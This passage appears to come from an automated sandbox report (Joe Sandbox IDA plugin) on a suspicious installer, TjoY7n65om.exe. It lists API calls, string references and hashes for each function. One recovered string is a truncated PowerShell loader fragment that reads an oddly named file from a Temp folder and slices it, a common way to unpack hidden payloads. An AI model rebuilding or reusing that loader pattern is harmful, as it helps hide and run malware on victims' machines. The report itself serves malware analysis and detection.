SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
InvalidateRect.USER32(?,00000000,00000001), ref: 004051E9
ShowWindow.USER32(?,00000000), ref: 00405237
GetDlgItem.USER32(?,000003FE), ref: 00405242
ShowWindow.USER32(00000000), ref: 00405249

Strings

M, xrefs: 00404E12
N, xrefs: 00404EF3
, xrefs: 00405221

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
Opcode Fuzzy Hash: db838c6bb8d772e12c4665b4b5b4d6ec78d20dbcb7ff8c3e764052d6be2fe8db
Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58

Function 004046EC Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040473B
SetWindowTextW.USER32(00000000,?), ref: 00404765
SHBrowseForFolderW.SHELL32(?), ref: 00404816
CoTaskMemFree.OLE32(00000000), ref: 00404821
lstrcmpiW.KERNEL32(: Completed,004236E8,00000000,?,?), ref: 00404853
lstrcatW.KERNEL32(?,: Completed), ref: 0040485F
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871

Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1

Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F

Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

A, xrefs: 0040480F
6B, xrefs: 004047E9
"$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5, xrefs: 00404705
: Completed, xrefs: 0040484D, 00404852, 0040485D
C:\Users\user\AppData\Local\Temp\depersonaliseredes, xrefs: 0040483C

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5$: Completed$A$C:\Users\user\AppData\Local\Temp\depersonaliseredes$6B
API String ID: 2624150263-1147956729
Opcode ID: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
Opcode Fuzzy Hash: 1856695c990301f96b0bfae571b3bc84039281bd83faa45955c02c51b4778447
Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D

Function 00405996 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059BF
lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A07
lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A2A
lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A30
FindFirstFileW.KERNEL32(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A40
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AE0
FindClose.KERNEL32(00000000), ref: 00405AEF

Strings

"C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00405996
C:\Users\user\AppData\Local\Temp\, xrefs: 004059A4
\*.*, xrefs: 00405A01

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-436228452
Opcode ID: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
Instruction ID: c51eb27d53b6fe35fd8e31d26e19e594c53701a60ebafcf50548af423f91ca56
Opcode Fuzzy Hash: d3b1db4ec6e858d6de83fe0182b98463dfe8c84cfbcf579265b0cac0546164ac
Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE

Function 004043BA Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
GetDlgItem.USER32(?,000003E8), ref: 0040446C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
GetSysColor.USER32(?), ref: 0040449A
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
lstrlenW.KERNEL32(?), ref: 004044BB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
GetDlgItem.USER32(?,0000040A), ref: 00404536
SendMessageW.USER32(00000000), ref: 0040453D
GetDlgItem.USER32(?,000003E8), ref: 00404568
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
SetCursor.USER32(00000000), ref: 004045BC
LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
SetCursor.USER32(00000000), ref: 004045D8
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619

Strings

N, xrefs: 00404556
: Completed, xrefs: 00404597
1C@, xrefs: 004045C4

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 1C@$: Completed$N
API String ID: 3103080414-516214725
Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14

Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
wsprintfA.USER32 ref: 00405F4F
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
GlobalFree.KERNEL32(00000000), ref: 00406038
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F

Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Strings

%ls=%ls, xrefs: 00405F45
[Rename], xrefs: 00405FB9, 00405FCB

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
Opcode Fuzzy Hash: 9fe56ee9aebbe4e8a82578a5ab6143b45b94006cc37f6f31d23d913fa1877209
Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD

Function 00406518 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\TjoY7n65om.exe",00403334,C:\Users\user\AppData\Local\Temp\,774D3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

Strings

"C:\Users\user\Desktop\TjoY7n65om.exe", xrefs: 00406518
C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E
*?|<>/":, xrefs: 0040656A

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\TjoY7n65om.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2244654023
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD

Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040427F
GetSysColor.USER32(00000000), ref: 004042BD
SetTextColor.GDI32(?,00000000), ref: 004042C9
SetBkMode.GDI32(?,?), ref: 004042D5
GetSysColor.USER32(?), ref: 004042E8
SetBkColor.GDI32(?,?), ref: 004042F8
DeleteObject.GDI32(?), ref: 00404312
CreateBrushIndirect.GDI32(?), ref: 0040431C

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
GetMessagePos.USER32 ref: 00404BD9
ScreenToClient.USER32(?,?), ref: 00404BF3
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B

Strings

f, xrefs: 00404C07

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436865792.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TjoY7n65om.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4

Function 00401DB9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401DBC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
ReleaseDC.USER32(?,00000000), ref: 00401DEF
CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E

Strings

Calibri, xrefs: 00401E24

Memory Dump Source

Source File: 00000000.00000002.1436637554.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436564220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436668256.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436693825.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
